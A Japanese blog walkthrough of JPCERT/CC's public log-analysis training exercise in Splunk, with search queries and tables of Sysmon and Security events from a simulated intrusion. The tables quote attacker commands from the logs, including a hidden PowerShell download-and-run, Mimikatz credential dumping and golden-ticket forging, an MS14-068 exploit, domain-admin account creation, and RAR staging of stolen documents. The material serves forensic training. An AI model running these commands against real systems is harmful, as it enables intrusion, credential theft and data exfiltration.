https://blogs.jpcert.or.jp/ja/2020/07/log_analysis_training.html
で「インシデント対応ハンズオン」でやってきたデータが公開されたのでSplunkでやってみる。
その1の続き
#準備
https://jpcertcc.github.io/log-analysis-training/
から
https://github.com/JPCERTCC/log-analysis-training
に飛んで、
git clone https://github.com/JPCERTCC/log-analysis-training.git
レポジトリがダウンロードできるので
zip -r Handson2 ./Handson2 とzip -r Handson3 ./Handson3で固めて、そのままSplunkにファイルアップロード。設定は全部デフォルト。
その1はtar.gzで固めておいて、今回はzip。その1も後で直します。
#その1のおさらい
source="Handson1.tar.gz:*"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
| search eventID=1 OR eventID=4688
| rex field=category "CommandLine: (?<CommandLine>.*)"
| rex field=category "CurrentDirectory: (?<CurrentDirectory>.*)"
| rex field=category "User: (?<User>.*)"
| rex field=category "ParentCommandLine: (?<ParentCommandLine>.*)"
| rex field=category "アカウント名:\s*(?<account_name>.*)"
| rex field=category "新しいプロセス名:\s*(?<process_name>.*)"
| table _time eventID account_name User process_name CommandLine ParentCommandLine
その2にいく前に、その1の攻撃がなにがあったのか全部は見ていないので、上のSPLで確認してみる。
| _time | eventID | account_name | User | process_name | CommandLine | ParentCommandLine |
|:--|--:|:--|:--|:--|:--|:--|:--|
| 2019/11/07 15:53:00 | 4688 | WIN7_64JP_01$ | | C:\Intel\Logs\win.exe | | |
| 2019/11/07 15:53:00 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 15:53:00 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\cmd.exe | | |
| 2019/11/07 15:53:00 | 1 | | NT AUTHORITY\SYSTEM | | C:\Intel\Logs\win.exe | C:\Windows\system32\cmd.EXE /c C:\Intel\Logs\win.exe" |
| 2019/11/07 15:53:00 | 1 | | NT AUTHORITY\SYSTEM | | ??\C:\Windows\system32\conhost.exe ""-874435639-776687532710720717314658271999960630-59840998594105233-1088315477"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 15:53:00 | 1 | | NT AUTHORITY\SYSTEM | | C:\Windows\system32\cmd.EXE /c C:\Intel\Logs\win.exe | taskeng.exe {54713E6C-87C6-4368-99B5-3DB599A32F37} S-1-5-18:NT AUTHORITY\System:Service:" |
| 2019/11/07 15:53:01 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 15:53:01 | 4688 | WIN7_64JP_01$ | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 15:53:01 | 1 | | NT AUTHORITY\SYSTEM | | ??\C:\Windows\system32\conhost.exe ""-2036399158354886860-1593503607-815046145354632507-177372701212922806811580081715"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 15:53:01 | 1 | | NT AUTHORITY\SYSTEM | | c:\windows\system32\cmd.exe | C:\Intel\Logs\win.exe" |
| 2019/11/07 15:53:04 | 4688 | WIN7_64JP_01$ | | C:\Windows\SysWOW64\reg.exe | | |
| 2019/11/07 15:53:04 | 1 | | NT AUTHORITY\SYSTEM | | reg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d C:\Windows\TEMP\notilv.exe /t REG_EXPAND_SZ | c:\windows\system32\cmd.exe" |
| 2019/11/07 15:53:42 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 15:53:42 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 15:53:42 | 1 | | EXAMPLE\chiyoda.tokyo | | ??\C:\Windows\system32\conhost.exe ""338926643-348954378-2113209370-681744015543502070-1801372689-218884517-1540709066"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 15:53:42 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""dir C:\Users*.doc* /s /o-d > C:\Intel\Logs\g.txt"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
| 2019/11/07 15:54:06 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 15:54:06 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 15:54:06 | 1 | | EXAMPLE\chiyoda.tokyo | | ??\C:\Windows\system32\conhost.exe ""1222508824390516827-632258474521428278-294794050-937943227-1138282998180917337"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 15:54:06 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""dir C:\Users*.xls* /s /o-d > C:\Intel\Logs\gg.txt"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
の序盤にすでにreg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d C:\Windows\TEMP\notilv.exe /t REG_EXPAND_SZということで仕込みが入っている
https://www.google.com/search?q=notilv.exe
ということです。
| _time | eventID | account_name | User | process_name | CommandLine | ParentCommandLine |
|:--|--:|:--|:--|:--|:--|:--|:--|
| 2019/11/07 16:03:41 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
|〜||||||
|〜||||||
| 2019/11/07 16:09:37 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""C:\Intel\Logs\mz.exe ""kerberos::ptt C:\Intel\Logs\500.kirbi"" exit"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
| 2019/11/07 16:09:55 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\net.exe | | |
| 2019/11/07 16:09:55 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 16:09:55 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 16:09:55 | 1 | | EXAMPLE\chiyoda.tokyo | | net use \Win7_64JP_03\c$ | cmd /c ""net use \Win7_64JP_03\c$""" |
| 2019/11/07 16:09:55 | 1 | | EXAMPLE\chiyoda.tokyo | | ??\C:\Windows\system32\conhost.exe ""1147167495-1419676949-726449530-72132199-2004977440-1417737552-2036662671158460362"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 16:09:55 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""net use \Win7_64JP_03\c$"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
| 2019/11/07 16:10:13 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 16:10:13 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 16:10:13 | 1 | | EXAMPLE\chiyoda.tokyo | | ??\C:\Windows\system32\conhost.exe ""1009238107-592299765-1064907537-564367463-211739964311103720272388828481763882392"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 16:10:13 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""copy C:\Intel\Logs\server.exe \Win7_64JP_03\c$\Intel\Logs\server.exe"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
| 2019/11/07 16:10:46 | 4688 | chiyoda.tokyo | | C:\Program Files (x86)\Internet Explorer\iexplore.exe | | |
| 2019/11/07 16:10:46 | 1 | | EXAMPLE\chiyoda.tokyo | | | :\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"" SCODEF:2736 CREDAT:2823572 /prefetch:2 | | :\Program Files\Internet Explorer\iexplore.exe"" -Embedding" |
| 2019/11/07 16:12:48 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\Macromed\Flash\FlashUtil64_22_0_0_210_ActiveX.exe | | |
| 2019/11/07 16:12:48 | 4688 | chiyoda.tokyo | | C:\Program Files (x86)\Internet Explorer\iexplore.exe | | |
| 2019/11/07 16:12:48 | 1 | | EXAMPLE\chiyoda.tokyo | | C:\Windows\system32\Macromed\Flash\FlashUtil64_22_0_0_210_ActiveX.exe -Embedding | C:\Windows\system32\svchost.exe -k DcomLaunch" |
| 2019/11/07 16:12:48 | 1 | | EXAMPLE\chiyoda.tokyo | | | :\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"" SCODEF:2736 CREDAT:3609960 /prefetch:2 | | :\Program Files\Internet Explorer\iexplore.exe"" -Embedding" |
| 2019/11/07 16:12:53 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\at.exe | | |
| 2019/11/07 16:12:53 | 4688 | WIN7_64JP_01$ | | C:\Windows\System32\conhost.exe | | |
| 2019/11/07 16:12:53 | 4688 | chiyoda.tokyo | | C:\Windows\SysWOW64\cmd.exe | | |
| 2019/11/07 16:12:53 | 1 | | EXAMPLE\chiyoda.tokyo | | at.exe \Win7_64JP_03 16:17 cmd /c ""C:\Intel\Logs\server.exe"" | cmd /c ""C:\Intel\Logs\z.bat""" |
| 2019/11/07 16:12:53 | 1 | | EXAMPLE\chiyoda.tokyo | | ??\C:\Windows\system32\conhost.exe ""-484825609-862984182-355161318171715924137718290510328514441107065334132563693"" | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" |
| 2019/11/07 16:12:53 | 1 | | EXAMPLE\chiyoda.tokyo | | cmd /c ""C:\Intel\Logs\z.bat"" | | :\Users\chiyoda.tokyo.EXAMPLE\AppData\Local\Temp\notilv.exe"" " |
ここの2019/11/07 16:12:53 at.exe \\Win7_64JP_03 16:17 cmd /c ""C:\Intel\Logs\server.exe"" を押さえておく必要がある。
eventID=1だけでも問題ないですね。
#その2
##Win7_64JP_03へ侵入後、どのようなツールやコマンドが実行されたか調査してください。
source="Handson2.zip:*"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
76件のイベント
ソースが2つだけなので、片方ずつ見てみる。
###Security
source="Handson2.zip:*" | rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)" | reverse
| rex field=category "アカウント名:\s*(?<account_name>.*)"
| rex field=category "ソース ネットワーク アドレス:\s*(?<src_ip>.*)"
| rex field=category "(?<message>.*)"| search source="Microsoft-Windows-Security-Auditing"
| table _time eventID src_ip account_name message
| _time | eventID | src_ip | account_name | message |
|---|---|---|---|---|
| 2019/11/07 16:03:42 | 4624 | 192.168.16.101 | - | ログオン,"アカウントが正常にログオンしました。 |
| 2019/11/07 16:03:53 | 4634 | chiyoda.tokyo | ログオフ,"アカウントがログオフしました。 | |
| 2019/11/07 16:06:04 | 4624 | 192.168.16.101 | - | ログオン,"アカウントが正常にログオンしました。 |
| 2019/11/07 16:06:04 | 4672 | sysg.admin | 特殊なログオン,"新しいログオンに特権が割り当てられました。 | |
| 2019/11/07 16:06:24 | 4624 | 192.168.16.101 | - | ログオン,"アカウントが正常にログオンしました。 |
| 2019/11/07 16:06:35 | 4634 | chiyoda.tokyo | ログオフ,"アカウントがログオフしました。 | |
| 2019/11/07 16:09:55 | 4624 | 192.168.16.101 | - | ログオン,"アカウントが正常にログオンしました。 |
| 2019/11/07 16:09:55 | 4672 | sysg.admin | 特殊なログオン,"新しいログオンに特権が割り当てられました。 | |
| 2019/11/07 16:21:19 | 4634 | sysg.admin | ログオフ,"アカウントがログオフしました。 | |
| 2019/11/07 16:28:49 | 4634 | sysg.admin | ログオフ,"アカウントがログオフしました。 | |
| 2019/11/07 17:05:19 | 4672 | SYSTEM | 特殊なログオン,"新しいログオンに特権が割り当てられました。 | |
| 2019/11/07 17:05:19 | 4624 | - | WIN7_64JP_03$ | ログオン,"アカウントが正常にログオンしました。 |
ログインとログアウトの表。攻撃元のログの時間と整合がとれている。
###TaskScheduler
source="Handson2.zip:*" | rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)" | reverse
| rex field=category "アカウント名:\s*(?<account_name>.*)"
| rex field=category "ソース ネットワーク アドレス:\s*(?<src_ip>.*)"
| search source="Microsoft-Windows-TaskScheduler"
| rex field=category "(?<message>.*)"
| table _time eventID source message
| _time | eventID | source | message |
|---|---|---|---|
| 2019/11/07 16:12:54 | 140 | Microsoft-Windows-TaskScheduler | タスクの登録が更新されました,"ユーザー ""EXAMPLE\sysg.admin"" はタスク スケジューラのタスク ""\At1"" を更新しました" |
| 2019/11/07 16:12:54 | 106 | Microsoft-Windows-TaskScheduler | タスクが登録されました,"ユーザー ""EXAMPLE\sysg.admin"" はタスク スケジューラのタスク ""\At1"" を登録しました。" |
| 2019/11/07 16:16:59 | 129 | Microsoft-Windows-TaskScheduler | タスクのプロセスが作成されました,"タスク スケジューラは、プロセス ID 1044 でタスク ""\At1""、インスタンス ""C:\Windows\system32\cmd.EXE"" を起動しました。" |
| 2019/11/07 16:16:59 | 200 | Microsoft-Windows-TaskScheduler | 開始された操作,"タスク スケジューラは、タスク ""\At1"" のインスタンス ""{E5A68698-5C63-4F90-AD70-64CCBD0B59BD}"" で操作 ""cmd"" を開始しました。" |
| 2019/11/07 16:16:59 | 100 | Microsoft-Windows-TaskScheduler | タスクの開始,"タスク スケジューラは、ユーザー ""EXAMPLE\WIN7_64JP_03$"" の ""\At1"" タスクの ""{E5A68698-5C63-4F90-AD70-64CCBD0B59BD}"" インスタンスを開始しました。" |
| 2019/11/07 16:16:59 | 319 | Microsoft-Windows-TaskScheduler | タスク エンジンはタスク開始のメッセージを受信しました,"タスク エンジン ""S-1-5-18:NT AUTHORITY\System:Service:"" は、タスク スケジューラ サービスからタスク ""\At1"" の起動を要求するメッセージを受信しました。" |
| 2019/11/07 16:16:59 | 107 | Microsoft-Windows-TaskScheduler | スケジューラによってトリガーされるタスク,"タスク スケジューラは、時間による起動条件で、タスク ""\At1"" の ""{E5A68698-5C63-4F90-AD70-64CCBD0B59BD}"" インスタンスを起動しました。" |
| 2019/11/07 16:41:00 | 102 | Microsoft-Windows-TaskScheduler | タスクが完了しました,"タスク スケジューラは、ユーザー ""EXAMPLE\WIN7_64JP_03$"" の ""\Adobe Flash Player Updater"" タスクの ""{734EC59E-D89D-4766-97D5-A165BE0F5787}"" インスタンスを正常に完了しました。" |
攻撃側のタスクスケジューラによるatコマンドが成功したことがこれでわかる。
でも、わかるのはこれくらい・・・・
回答をみてみると _| ̄|○ そうなのか・・・
#その3
##Win7_64JP_01の侵入元であるWin10_64JP_09が侵入した端末を特定してください。
source="Handson3.zip:*"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
でいったんは全般を検索
ヒントをみるとその1の結果をみろというのでSplunk的に検索
source="Handson1.tar.gz:*" win.exe "Microsoft-Windows-Sysmon"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
| table _time _raw
調べるとdwm.exeからwin.exeがコピーされているので、こちらで検索しなおし
source="Handson1.tar.gz:*" OR source="Handson3.zip:*" dwm.exe "Microsoft-Windows-Sysmon"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
| rex field=category "CommandLine:\s*(?<CommandLine>.*)"
| table _time CommandLine
####list
| _time | CommandLine |
|---|---|
| 2019/11/07 15:16:53 | ??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| 2019/11/07 15:16:53 | ""C:\Windows\System32\cmd.exe"" /c start winword /m&powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile(""""""http://news-landsbbc.co/upload/21.jpg """""", """"""$env:tmp\dwm.exe"""""")';Invoke-Expression $c&C:\Users\MAEBAS~1.GUN\AppData\Local\Temp\dwm.exe ""%CD%"" |
| 2019/11/07 15:16:56 | powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile(""""""http://news-landsbbc.co/upload/21.jpg """""", """"""$env:tmp\dwm.exe"""""")';Invoke-Expression $c` |
| 2019/11/07 15:16:57 | C:\Users\MAEBAS~1.GUN\AppData\Local\Temp\dwm.exe ""C:\Users\maebashi.gunma\Desktop"" |
| 2019/11/07 15:17:00 | c:\windows\system32\cmd.exe |
| 2019/11/07 15:18:40 | cmd /c ""tasklist"" |
| 2019/11/07 15:20:15 | cmd /c ""whoami /all"" |
| 2019/11/07 15:21:15 | cmd /c ""C:\Intel\Logs\csvde.exe -f C:\Intel\Logs\l.txt"" |
| 2019/11/07 15:21:36 | cmd /c ""type C:\Intel\Logs\l.txt"" |
| 2019/11/07 15:22:00 | cmd /c ""echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\z.ps1"" |
| 2019/11/07 15:22:25 | cmd /c ""echo $p.DownloadFile(""http://anews-web.co/mz.exe"", ""C:\Intel\Logs\mz.exe"") >> C:\Intel\Logs\z.ps1"" |
| 2019/11/07 15:22:51 | cmd /c ""powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\z.ps1"" |
| 2019/11/07 15:23:54 | cmd /c ""C:\Intel\Logs\mz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit > C:\Intel\Logs\c.txt"" |
| 2019/11/07 15:24:16 | cmd /c ""type C:\Intel\Logs\c.txt"" |
| 2019/11/07 15:24:37 | cmd /c ""echo $p = New-Object System.Net.WebClient > C:\Intel\Logs\p.ps1"" |
| 2019/11/07 15:24:58 | cmd /c ""echo $p.DownloadFile(""http://anews-web.co/rar.exe"", ""C:\Intel\Logs\rar.exe"") >> C:\Intel\Logs\p.ps1"" |
| 2019/11/07 15:25:19 | cmd /c ""echo $p.DownloadFile(""http://anews-web.co/ms14068.rar"", ""C:\Intel\Logs\ms14068.rar"") >> C:\Intel\Logs\p.ps1"" |
| 2019/11/07 15:25:43 | cmd /c ""powershell -ExecutionPolicy ByPass -File C:\Intel\Logs\p.ps1"" |
| 2019/11/07 15:26:07 | cmd /c ""C:\Intel\Logs\rar.exe x C:\Intel\Logs\ms14068.rar C:\Intel\Logs"" |
| 2019/11/07 15:26:37 | cmd /c ""C:\Intel\Logs\ms14068\ms14-068.exe -u maebashi.gunma@example.co.jp -s S-1-5-21-1524084746-3249201829-3114449661-1127 -d win-wfbhibe5gxz -p p@ssw0rd"" |
| 2019/11/07 15:27:11 | cmd /c ""klist purge"" |
| 2019/11/07 15:27:28 | cmd /c ""klist purge"" |
| 2019/11/07 15:27:58 | cmd /c ""C:\Intel\Logs\mz.exe ""kerberos::ptc TGT_maebashi.gunma@example.co.jp.ccache"" exit > C:\Intel\Logs\m.txt"" |
| 2019/11/07 15:28:31 | cmd /c ""type C:\Intel\Logs\m.txt"" |
| 2019/11/07 15:29:37 | cmd /c ""net user machida.kanagawa h4ckp@ss /add /domain"" |
| 2019/11/07 15:29:58 | cmd /c ""net groups ""Domain Admins"" machida.kanagawa /add /domain"" |
| 2019/11/07 15:31:02 | cmd /c ""net use j: \192.168.16.1\c$ h4ckp@ss /user:example.co.jp\machida.kanagawa"" |
| 2019/11/07 15:31:17 | cmd /c ""copy C:\Intel\Logs\mz.exe J:\Windows\Temp\mz.exe"" |
| 2019/11/07 15:34:29 | cmd /c ""C:\Intel\Logs\b.bat"" |
| 2019/11/07 15:37:44 | cmd /c ""type J:\Windows\Temp\o.txt"" |
| 2019/11/07 15:37:59 | cmd /c ""copy J:\Windows\Temp\o.txt C:\Intel\Logs\o.txt"" |
| 2019/11/07 15:38:26 | cmd /c ""C:\Intel\Logs\mz.exe ""kerberos::golden /domain:example.co.jp /sid:S-1-5-21-1524084746-3249201829-3114449661 /rc4:b23a3443a12bf736973741f65ddcbc83 /user:sysg.admin /id:500 /ticket:C:\Intel\Logs\500.kirbi"" exit"" |
| 2019/11/07 15:39:00 | cmd /c ""klist purge"" |
| 2019/11/07 15:39:27 | cmd /c ""C:\Intel\Logs\mz.exe ""kerberos::ptt C:\Intel\Logs\500.kirbi"" exit"" |
| 2019/11/07 15:39:57 | cmd /c ""dir C:\Users*.doc* /s /o-d > C:\Intel\Logs\r.txt"" |
| 2019/11/07 15:40:21 | cmd /c ""net user machida.kanagawa /delete"" |
| 2019/11/07 15:41:24 | cmd /c ""ping 192.168.16.101"" |
| 2019/11/07 15:41:42 | cmd /c ""ping 192.168.16.102"" |
| 2019/11/07 15:42:14 | cmd /c ""ping 192.168.16.103"" |
| 2019/11/07 15:42:35 | cmd /c ""ping 192.168.16.104"" |
| 2019/11/07 15:42:56 | cmd /c ""net use \Win7_64JP_01\c$"" |
| 2019/11/07 15:44:30 | cmd /c ""copy C:\Intel\Logs\win.exe \Win7_64JP_01\c$\Intel\Logs\win.exe"" |
| 2019/11/07 15:49:21 | cmd /c ""C:\Intel\Logs\q.bat"" |
| 2019/11/07 16:54:51 | cmd /c ""dir \Win7_64JP_01\c$\Users\chiyoda.tokyo.EXAMPLE*.doc* /s /o-d > C:\Intel\Logs\k.txt"" |
| 2019/11/07 16:56:28 | cmd /c ""type C:\Intel\Logs\k.txt"" |
| 2019/11/07 16:58:37 | cmd /c ""C:\Intel\Logs\rar.exe a -r -ed -v300m -taistoleit C:\Intel\Logs\d.rar ""\Win7_64JP_01\c$\Users\chiyoda.tokyo.EXAMPLE\Documents"" -n*.docx -n*.pptx -n*.txt -n*.xlsx"" |
| 2019/11/07 17:01:49 | cmd /c ""del C:\Intel\Logs*"" |
Win7_64JP_01以外にもcmd /c ""net use j: \\192.168.16.1\c$ h4ckp@ss /user:example.co.jp\machida.kanagawa"" ということでADにもアクセスしている。
回答だとnet useで検索ということだけど、実際はこんな感じで一通り見て行った結果としてなんじゃないかな〜
##Win10_64JP_09がマルウエアに感染した原因を特定してください。
情報,2019/11/07 15:16:53,Microsoft-Windows-Sysmon,1,Process Create (rule: ProcessCreate),"Process Create:
UtcTime: 2019-11-07 06:16:53.068
ProcessGuid: {CC41BF7E-4FD5-5A01-0000-0010B7831B00}
ProcessId: 5560
Image: C:\Windows\System32\cmd.exe
CommandLine: ""C:\Windows\System32\cmd.exe"" /c start winword /m&powershell -windowstyle hidden $c='(new-object System.Net.WebClient).D'+'ownloadFile(""""""http://news-landsbbc.co/upload/21.jpg """""", """"""$env:tmp\dwm.exe"""""")';Invoke-Expression $c&C:\Users\MAEBAS~1.GUN\AppData\Local\Temp\dwm.exe ""%CD%""
CurrentDirectory: C:\Users\maebashi.gunma\Desktop\
User: EXAMPLE\maebashi.gunma
LogonGuid: {CC41BF7E-4CE6-5A01-0000-002031FB0200}
LogonId: 0x2FB31
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=99AE9C73E9BEE6F9C76D6F4093A9882DF06832CF
ParentProcessGuid: {CC41BF7E-4CF3-5A01-0000-0010EB5D0300}
ParentProcessId: 2144
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE"
先の表から引っ張ってきたイベントがこちら。
その付近をParentCommandLineをキーに検索
source="Handson3.zip:*" "C:\\Windows\\Explorer.EXE" "Microsoft-Windows-Sysmon"
| rex "(?ms)(?<level>[^,]+),(?<date>[^,]+),(?<source>[^,]+),(?<eventID>\d+),(?<category>.*)"
| reverse
| table _time _raw
情報,2019/11/07 15:16:45,Microsoft-Windows-Sysmon,2,File creation time changed (rule: FileCreateTime),"File creation time changed:
UtcTime: 2019-11-07 06:16:44.914
ProcessGuid: {CC41BF7E-4CF3-5A01-0000-0010EB5D0300}
ProcessId: 2144
Image: C:\Windows\Explorer.EXE
TargetFilename: C:\Users\maebashi.gunma\Desktop\Interview.doc.lnk
CreationUtcTime: 2019-09-28 06:59:40.000
PreviousCreationUtcTime: 2019-11-07 06:16:44.804"
リンクファイルを保存した形跡がある。
回答ではメールから保存と書いていたけど、それがわからずにずっと探してしまった。
##漏えいした可能性がある情報を特定してください。
#listに戻って見てみると
2019/11/07 15:21:15 cmd /c ""C:\Intel\Logs\csvde.exe -f C:\Intel\Logs\l.txt""
が気になる。
https://www.google.com/search?q=csvde.exe
によるとActive Directoryのアカウント情報がl.txtで出力されている。
あと、
2019/11/07 15:26:37 cmd /c ""C:\Intel\Logs\ms14068\ms14-068.exe -u maebashi.gunma@example.co.jp -s S-1-5-21-1524084746-3249201829-3114449661-1127 -d win-wfbhibe5gxz -p p@ssw0rd""
については
https://jpcertcc.github.io/ToolAnalysisResultSheet_jp/details/MS14-068.htm
に解説があった。
いろいろと調査して、結果として
2019/11/07 16:58:37 cmd /c ""C:\Intel\Logs\rar.exe a -r -ed -v300m -taistoleit C:\Intel\Logs\d.rar ""\Win7_64JP_01\c$\Users\chiyoda.tokyo.EXAMPLE\Documents"" -n*.docx -n*.pptx -n*.txt -n*.xlsx""
でデータを固められている。のでこれ。
##Win10_64JP_09でPowerShellファイルが実行されたようです。このファイルは何を行うものですか?
source="Handson3.zip:*" .ps1
| table _time _rawsource="Handson3.zip:*" .ps1
| table _time _raw
| reverse
で見ていくとexeとrarを3つダウンロードすることがわかる。
#まとめ
Sysmonが入っていると実行されたコマンドが追跡できるので、ウィルス対策ソフトが検知できなかったとしても何が起こっていたのかが理解しやすい。
| table _time _rawを使用していたのは、このファイルの形式だと、省略して表示されてしまうので、ざっとみるために入れています。
一つをきっかけに、いろいろ調べて、また戻っての繰り返しなので、手元にメモ等は必須ですね
その4はまたの機会に